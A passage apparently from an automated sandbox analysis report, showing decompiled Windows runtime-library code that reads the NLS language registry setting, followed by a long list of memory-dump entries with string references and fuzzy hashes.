                                      					_t97 = 0xc000000d;
                                      				} else {
                                      					_t93 = _a4;
                                      					if(_t93 == 0) {
                                      						goto L28;
                                      					}
                                      					_t78 = E0197F358(__ecx, 0xac);
                                      					if(_t78 == 0) {
                                      						_t97 = 0xc0000017;
                                      						L6:
                                      						if(_v56 != 0) {
                                      							_push(_v56);
                                      							E019B95D0();
                                      						}
                                      						if(_t78 != 0) {
                                      							L019977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                      						}
                                      						return _t97;
                                      					}
                                      					E019BFA60(_t78, 0, 0x158);
                                      					_v48 = _v48 & 0x00000000;
                                      					_t102 = _t101 + 0xc;
                                      					 *_t96 = 0;
                                      					 *_t93 = 0;
                                      					E019BBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                      					_v36 = 0x18;
                                      					_v28 =  &_v44;
                                      					_v64 = 0;
                                      					_push( &_v36);
                                      					_push(0x20019);
                                      					_v32 = 0;
                                      					_push( &_v64);
                                      					_v24 = 0x40;
                                      					_v20 = 0;
                                      					_v16 = 0;
                                      					_t97 = E019B9600();
                                      					if(_t97 < 0) {
                                      						goto L6;
                                      					}
                                      					E019BBB40(0,  &_v36, L"InstallLanguageFallback");
                                      					_push(0);
                                      					_v48 = 4;
                                      					_t97 = L0197F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                      					if(_t97 >= 0) {
                                      						if(_v52 != 1) {
                                      							L17:
                                      							_t97 = 0xc0000001;
                                      							goto L6;
                                      						}
                                      						_t59 =  *_t78 & 0x0000ffff;
                                      						_t94 = _t78;
                                      						_t83 = _t59;
                                      						if(_t59 == 0) {
                                      							L19:
                                      							if(_t83 == 0) {
                                      								L23:
                                      								E019BBB40(_t83, _t102 + 0x24, _t78);
                                      								if(L019843C0( &_v48,  &_v64) == 0) {
                                      									goto L17;
                                      								}
                                      								_t84 = _v48;
                                      								 *_v48 = _v56;
                                      								if( *_t94 != 0) {
                                      									E019BBB40(_t84, _t102 + 0x24, _t94);
                                      									if(L019843C0( &_v48,  &_v64) != 0) {
                                      										 *_a4 = _v56;
                                      									} else {
                                      										_t97 = 0xc0000001;
                                      										 *_v48 = 0;
                                      									}
                                      								}
                                      								goto L6;
                                      							}
                                      							_t83 = _t83 & 0x0000ffff;
                                      							while(_t83 == 0x20) {
                                      								_t94 =  &(_t94[1]);
                                      								_t74 =  *_t94 & 0x0000ffff;
                                      								_t83 = _t74;
                                      								if(_t74 != 0) {
                                      									continue;
                                      								}
                                      								goto L23;
                                      							}
                                      							goto L23;
                                      						} else {
                                      							goto L14;
                                      						}
                                      						while(1) {
                                      							L14:
                                      							_t27 =  &(_t94[1]); // 0x2
                                      							_t75 = _t27;
                                      							if(_t83 == 0x2c) {
                                      								break;
                                      							}
                                      							_t94 = _t75;
                                      							_t76 =  *_t94 & 0x0000ffff;
                                      							_t83 = _t76;
                                      							if(_t76 != 0) {
                                      								continue;
                                      							}
                                      							goto L23;
                                      						}
                                      						 *_t94 = 0;
                                      						_t94 = _t75;
                                      						_t83 =  *_t75 & 0x0000ffff;
                                      						goto L19;
                                      					}
                                      				}
                                      			}

                                      Strings
                                      • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0197E68C
                                      • InstallLanguageFallback, xrefs: 0197E6DB
                                      • @, xrefs: 0197E6C0
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                      • API String ID: 0-1757540487
                                      • Opcode ID: 411cc06e2d88002a72f8a46a86e137b3d52df88abfa18594f6961b13b9f96ad4
                                      • Instruction ID: 3d90f2231a538eb31978d53167aa21195b7ddec5352157f1d1ce02d2327e1118
                                      • Opcode Fuzzy Hash: 411cc06e2d88002a72f8a46a86e137b3d52df88abfa18594f6961b13b9f96ad4
                                      • Instruction Fuzzy Hash: 9151C1715043069BE711DF28C480AABB7E8BF88755F45496EF98DD7240F730D904C7A2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                      • API String ID: 0-2558761708
                                      • Opcode ID: 831ff6a8ad38a3cc29f8425c78ae1fcefdf1a296fcd15f251bfdfc44bb16fedd
                                      • Instruction ID: a7c684acae5882da05310a1f56389035d836614af81a2d6e48d29f3e9b3591bc
                                      • Opcode Fuzzy Hash: 831ff6a8ad38a3cc29f8425c78ae1fcefdf1a296fcd15f251bfdfc44bb16fedd
                                      • Instruction Fuzzy Hash: AC11D3317241029FDB29DB1EE484F35B7A9FF80629F148469E40FCB251E638D881C791
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: `$`
                                      • API String ID: 0-197956300
                                      • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                      • Instruction ID: be9341973170fe3f5f69648a35f78dfa841e850642dfa483a99babc828a14a79
                                      • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                      • Instruction Fuzzy Hash: 42918F716043429FE725CF29C941B5BBBE6AFC4714F18892DF699CB280E774E904CB52
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID: Legacy$UEFI
                                      • API String ID: 2994545307-634100481
                                      • Opcode ID: 54c6c7a828bc45174e5ede7886220de53c4d1cb590de43daa6d35479e7834e3e
                                      • Instruction ID: 2b9c6f087415d6bdd8d94fc64a3c758873ab4440d199d446ffe5519124ed0b14
                                      • Opcode Fuzzy Hash: 54c6c7a828bc45174e5ede7886220de53c4d1cb590de43daa6d35479e7834e3e
                                      • Instruction Fuzzy Hash: C6515CB5A00709EFEB25DFA8C980AADBBF9FF48704F15442DE64DEB251D6B19900CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0199B9A5
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                      • String ID:
                                      • API String ID: 885266447-0
                                      • Opcode ID: 83da3948e5158e1fba38b6629dcedbba5ef94d2414402bbdb9d59abd1b07adb7
                                      • Instruction ID: 6df3bb3d8b372464f709d0fce8be097fe10db1cba071765e071ddf8f4c92ba50
                                      • Opcode Fuzzy Hash: 83da3948e5158e1fba38b6629dcedbba5ef94d2414402bbdb9d59abd1b07adb7
                                      • Instruction Fuzzy Hash: 90516B71A09301CFCB21CF6DD080D2ABBE9FB88605F14896EE58A87355D739EC40CB92
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: _vswprintf_s
                                      • String ID:
                                      • API String ID: 677850445-0
                                      • Opcode ID: ecb2057ba177a18d843710cedecf5e7b63049c57daea2961f5e2095003d1b100
                                      • Instruction ID: 3b55d3b6646bc02d1d8c1015091801750036e11d2674313fe2421f479c20c455
                                      • Opcode Fuzzy Hash: ecb2057ba177a18d843710cedecf5e7b63049c57daea2961f5e2095003d1b100
                                      • Instruction Fuzzy Hash: 54510171D0025A8FEF31CF68C985BAEBBB4BF40751F1081ADD85DABA82D7704941CB92
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: PATH
                                      • API String ID: 0-1036084923
                                      • Opcode ID: 58e43941128d38f9f9460c374b7e19ea0ab23120c1d3c024b1b4b79c26bce8cb
                                      • Instruction ID: 8c5c36c577e56beb382cd038ac3e15c5a601ef6d7927bf8f8e3e561d74fc94b4
                                      • Opcode Fuzzy Hash: 58e43941128d38f9f9460c374b7e19ea0ab23120c1d3c024b1b4b79c26bce8cb
                                      • Instruction Fuzzy Hash: 87C1D2B5D00219DFDB25DF98C980BADBBF5FF88740F884429E909BB250D734A945CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 019EBE0F
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                      • API String ID: 0-865735534
                                      • Opcode ID: cd94c7fce1dc2b8821d15a9389efd974f01d4802d44764b9964173bb424e86db
                                      • Instruction ID: f246753675d2b3a29cf617b8afbc4ed3c57432f266f90066d42a0bb64ef2fdd2
                                      • Opcode Fuzzy Hash: cd94c7fce1dc2b8821d15a9389efd974f01d4802d44764b9964173bb424e86db
                                      • Instruction Fuzzy Hash: 4CA12271B006068BEB26DF69C454B7EB7F8AF48711F04496DEA0ECB681DB34D8498BC0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: RTL: Re-Waiting
                                      • API String ID: 0-316354757
                                      • Opcode ID: 13ebc184afa849c6ae8befb14d6646008eac5390814bacbdced1f6e6cba842a8
                                      • Instruction ID: 8c5fbd25d0c390c3c229b7791c1b5f16c668b6f7c31d53dc2b266902f471babb
                                      • Opcode Fuzzy Hash: 13ebc184afa849c6ae8befb14d6646008eac5390814bacbdced1f6e6cba842a8
                                      • Instruction Fuzzy Hash: 11613731A106059FEB32DF6CC884B7EBBEAEF44B14F140A69D95DA72C1D734A901C792
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: `
                                      • API String ID: 0-2679148245
                                      • Opcode ID: 3aae6e8bae11e11a105b05a0192e43deba013d35a478c2c9bb481f782192172b
                                      • Instruction ID: bbafd6d5869f56c4edbba76e032b8c3bd84186688ae710c8d82f381e53e145be
                                      • Opcode Fuzzy Hash: 3aae6e8bae11e11a105b05a0192e43deba013d35a478c2c9bb481f782192172b
                                      • Instruction Fuzzy Hash: 4A518C713043429FE325DF28D984B5BBBE9EBC4614F04092CFA9697290D675E846CB62
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: @
                                      • API String ID: 0-2766056989
                                      • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                      • Instruction ID: f452eda9edb029153a282baf6a4715e674763cc883a2660503614cf4913c02fa
                                      • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                      • Instruction Fuzzy Hash: BE517C715047159FC321DF19C840A6BBBF8FF88714F00892EFA9987690E7B4E904CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: BinaryHash
                                      • API String ID: 0-2202222882
                                      • Opcode ID: 7f9b7b511c08af5c78fbe814c9bf454b3721be20d3f01e4fe37e25bbad165776
                                      • Instruction ID: e757d9d2475acda52a24580f1240543c1c9f1406e7b710617adf348df7b77fe5
                                      • Opcode Fuzzy Hash: 7f9b7b511c08af5c78fbe814c9bf454b3721be20d3f01e4fe37e25bbad165776
                                      • Instruction Fuzzy Hash: E74133B1D0052DAADB21DA54CD85FEEB77CAB44714F0045A9EB0DAB240DB349F88CF94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: `
                                      • API String ID: 0-2679148245
                                      • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                      • Instruction ID: 931e318d77355df87f8527a377958f2e07be3a90d240028ddf1a1d36a6bbfcbc
                                      • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                      • Instruction Fuzzy Hash: F031E2322043066BE710DF28CE84F97BBD9ABC4754F144229FB59DB280E6B0E904CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: BinaryName
                                      • API String ID: 0-215506332
                                      • Opcode ID: b262164d4cabe86d6bab34e2ff5b833c808bd07d35ab96cabd435476841ffb29
                                      • Instruction ID: 941fb700d5ecb833cb2e20f045ae5a15ed7692508f66608b9e3c0479d54a4dfa
                                      • Opcode Fuzzy Hash: b262164d4cabe86d6bab34e2ff5b833c808bd07d35ab96cabd435476841ffb29
                                      • Instruction Fuzzy Hash: 7731D472D0051AFFDB15DA58C945D6BBBB8FB80724F11816DAA1CA7250D6349F40CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: @
                                      • API String ID: 0-2766056989
                                      • Opcode ID: 72394f7206f7281b6ad49d2a664fd4f8455090ea9f1946a8969c25d7dd935943
                                      • Instruction ID: f35dbf3975539becd21cf15ccc5357b2d4fd630b2ddd95d30f4c29955b509385
                                      • Opcode Fuzzy Hash: 72394f7206f7281b6ad49d2a664fd4f8455090ea9f1946a8969c25d7dd935943
                                      • Instruction Fuzzy Hash: 88318DB5508305AFC721DF68C9809AFBBE8FBD5658F40092EF99983650DA34DD09CBD2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: WindowsExcludedProcs
                                      • API String ID: 0-3583428290
                                      • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                      • Instruction ID: bfd18e07a20d571337e7944f7bd9116fc7b951e37e39995b1f25b6621418eb84
                                      • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                      • Instruction Fuzzy Hash: 9721DA77901129AFDB22AA9DC980F5B7B6DEF81656F058435FE0CDB200D630DD02D7A0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: Actx
                                      • API String ID: 0-89312691
                                      • Opcode ID: c4e68f333f395bbe2afb3fd90605fa4b3a29829b55213a009d6889391d3c80d6
                                      • Instruction ID: bfc76283f48911f33175e25b0a142fc5a2f41292d298ff8e0a4fd87630ad4ab6
                                      • Opcode Fuzzy Hash: c4e68f333f395bbe2afb3fd90605fa4b3a29829b55213a009d6889391d3c80d6
                                      • Instruction Fuzzy Hash: F8119035308B028BFF254E1D8494B3EFEDDEB85726F25492AE56DCB391DA70C8408341
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      • Critical error detected %lx, xrefs: 01A28E21
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: Critical error detected %lx
                                      • API String ID: 0-802127002
                                      • Opcode ID: a69423f97d2ad08af1108167ff547f0ca14d5b155bb814613ad23faf88411ffe
                                      • Instruction ID: f70a47066b1961bef93243fed232cdad9c3829be52812e3f23397a9dd06f25f7
                                      • Opcode Fuzzy Hash: a69423f97d2ad08af1108167ff547f0ca14d5b155bb814613ad23faf88411ffe
                                      • Instruction Fuzzy Hash: BF1157B1D14348EBDF29CFA8850579CBBF0BB54B14F24426EE5A9AB282C3385602CF55
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 01A0FF60
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                      • API String ID: 0-1911121157
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 97a962e3359e91c3b280db76efc45727be72269ef1481c68c61d8eb5f4230eaa
                                      • Instruction ID: 1dcec00962af2d24ad57740f4cf51423ce62df083284cf3bee73f2204ec19229
                                      • Opcode Fuzzy Hash: 97a962e3359e91c3b280db76efc45727be72269ef1481c68c61d8eb5f4230eaa
                                      • Instruction Fuzzy Hash: 7131E371A0021AEBCF15EFA8CD81ABFB7B9EF44700F454469F909E7150E7349951CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9f54fabcd40cec61f56b516f20d18692dad64af1e686bd3122cf99c3f7647cb2
                                      • Instruction ID: 844670df399db243ec76fc3c3885159a26f9416b15be162931bcf7d0f504c958
                                      • Opcode Fuzzy Hash: 9f54fabcd40cec61f56b516f20d18692dad64af1e686bd3122cf99c3f7647cb2
                                      • Instruction Fuzzy Hash: CE31E436245351EBDB22AF59CA84B6ABBACFFC0B11F404529E55F47252C774D800DB86
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ab95da311b0ef29709b055fa92f16ac94ad9881b89167fac0bc9fc99d63834dc
                                      • Instruction ID: ba45da8b92bea3dccd2ea3e1d8b19ef3c8260e1bc15be23980275c9373930cf2
                                      • Opcode Fuzzy Hash: ab95da311b0ef29709b055fa92f16ac94ad9881b89167fac0bc9fc99d63834dc
                                      • Instruction Fuzzy Hash: 31417EB1D00218AEDB24CFAAD981AADFBF8FB48710F5041AEE54DA7240E7745A84CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0ade372ffc9a859e917b1f52b7a0fe7bc51d4caee6d994fe37d90d0ee87ca582
                                      • Instruction ID: e22b6359e350a7cd1c3a74008997bfa29adb425661fd490d595f58210ca9bca6
                                      • Opcode Fuzzy Hash: 0ade372ffc9a859e917b1f52b7a0fe7bc51d4caee6d994fe37d90d0ee87ca582
                                      • Instruction Fuzzy Hash: 6C315C75A14249EFD744CF58D841F9ABBE8FB09214F548666FA08CB341E631ED84CBE1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8271ea6a25818a7a2abdc4309694584bd185b36fcc4ceb55e4e03390694bbc08
                                      • Instruction ID: 1433db4becf0b24d053a08bacd5551c11abcee796c018327bb87308ea62a805a
                                      • Opcode Fuzzy Hash: 8271ea6a25818a7a2abdc4309694584bd185b36fcc4ceb55e4e03390694bbc08
                                      • Instruction Fuzzy Hash: A931DF76A006169BCB12DF58D480BA677B8FB18321F454479ED4EDB205EB74D90A8BC0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8f1d389ff04e8d1b1ccc1952fb4f13a45f591c80ad35068cda24354f381fa568
                                      • Instruction ID: 1d40d22d8f980e67a3e8b2ced612ec2450286663d93dfd7c180f8fcad0de5873
                                      • Opcode Fuzzy Hash: 8f1d389ff04e8d1b1ccc1952fb4f13a45f591c80ad35068cda24354f381fa568
                                      • Instruction Fuzzy Hash: 733103B5A01682DFEB22DB6CD488B9CBBF9FF89329F15815DC40C67251C334A990CB52
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                      • Instruction ID: a8192448ce40536b9b75824ba1bdc7569768a7507a0699edcdba2d13ad011c95
                                      • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                      • Instruction Fuzzy Hash: 6C21DE72640109EFD721CF99CC80EABBBBDEF85641F654065EA09D7220D630AE11CBE0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9f5e5e4692816c383627fae3a897a92ebdf76bfacc3187616dc0e26fc433a57a
                                      • Instruction ID: 9aac325ae629752b9afa3141f89039905e8419166f9f18f17f0ea3614c94f486
                                      • Opcode Fuzzy Hash: 9f5e5e4692816c383627fae3a897a92ebdf76bfacc3187616dc0e26fc433a57a
                                      • Instruction Fuzzy Hash: 09318F31601B04CFDB22CF2CC940B96B7E9FF89715F18456DE5AA87690DB75AC01CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e2de26a1e46e40c00d4f5a01b6a14706f6edd02d4ae11a156cdbafa167cb402d
                                      • Instruction ID: 8be2887a1fb0003b8fe1b52e723b99a814f372eb396d97abd49a9fffef55d183
                                      • Opcode Fuzzy Hash: e2de26a1e46e40c00d4f5a01b6a14706f6edd02d4ae11a156cdbafa167cb402d
                                      • Instruction Fuzzy Hash: 5B219AB1A00645BBDB15DBACD980F6AB7B8FF48744F140069FA48D7790DA34E910CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                      • Instruction ID: 46a6cc571edea3e644fd38589348b62980529e5564892995db7579ce4d49959a
                                      • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                      • Instruction Fuzzy Hash: B02171B1A00205EFDB21DF59C984E9AFBF8EB54754F14887EEA4997200D230A9009B90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3d20194dac240f992b65231d161adae80b95169005344f464bfec44eb26df2e9
                                      • Instruction ID: 1c969985567e7f88456a2d3736e7fe4e212a26638682dd3b30120d66f39b6d1d
                                      • Opcode Fuzzy Hash: 3d20194dac240f992b65231d161adae80b95169005344f464bfec44eb26df2e9
                                      • Instruction Fuzzy Hash: 072192B2A00109AFCB15DF58CD85F5ABBBDFB44748F150068E908AB252D775EE06CBD0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 84a72df62612fc5273edd970e883ca62e373b86beaf6227f789366d12d6cf8f4
                                      • Instruction ID: c350e74784e0e63cf34bac414dea1f989d2f373a61a9b3ad49de39305a3455f0
                                      • Opcode Fuzzy Hash: 84a72df62612fc5273edd970e883ca62e373b86beaf6227f789366d12d6cf8f4
                                      • Instruction Fuzzy Hash: 0121D072500345ABD711DF6CCD44B6BBBECAFD1644F04095ABA4887291EB34D948C7A2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                      • Instruction ID: 75e5ff4ca9748606bb74c231dca9c36441dacb3da8e571d68a184574db0270a1
                                      • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                      • Instruction Fuzzy Hash: 712126363046009FE705DF1CC980BAABBE5EFD4350F048569FA958B385DB30D909CB92
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 10655c2d5a274b32dee474d538ec2a549c649ab14b74a82b8e6e3e15a0e9d02c
                                      • Instruction ID: e2f855042ac7c97ae371ffe5626adccf13b0b8987707dbe289c53ef508f95d1b
                                      • Opcode Fuzzy Hash: 10655c2d5a274b32dee474d538ec2a549c649ab14b74a82b8e6e3e15a0e9d02c
                                      • Instruction Fuzzy Hash: 50216F72510604ABC729DFA9D890EABBBADEF88740F10456DE60AD7650D634E900CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                      • Instruction ID: e0197a0ae0f6349998fdd197ef1fe770950339943e90f454e65896bddf6d0511
                                      • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                      • Instruction Fuzzy Hash: 3321D4326016859FEB179BADC948B2577ECEF45640F0900A1DD0C8B692DB75EC40CA90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                      • Instruction ID: 964d8d2984ee4627965bd666dbf2fb30a713fcf9d457ee6d31c1dc5fa00913a3
                                      • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                      • Instruction Fuzzy Hash: 49216872640A41DBDB36CF4DC640E6AFBE9EB94B11F65856EEA4987611D730AC04CBC0
                                      Uniqueness

